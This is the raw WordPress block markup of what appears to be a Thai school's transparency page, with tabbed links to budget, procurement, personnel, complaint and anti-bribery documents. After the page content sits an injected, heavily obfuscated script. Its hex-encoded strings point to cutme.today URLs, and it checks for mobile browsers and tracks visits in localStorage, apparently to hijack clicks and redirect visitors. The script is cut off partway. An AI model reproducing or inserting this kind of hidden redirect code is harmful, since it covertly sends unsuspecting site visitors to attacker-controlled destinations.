xt\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 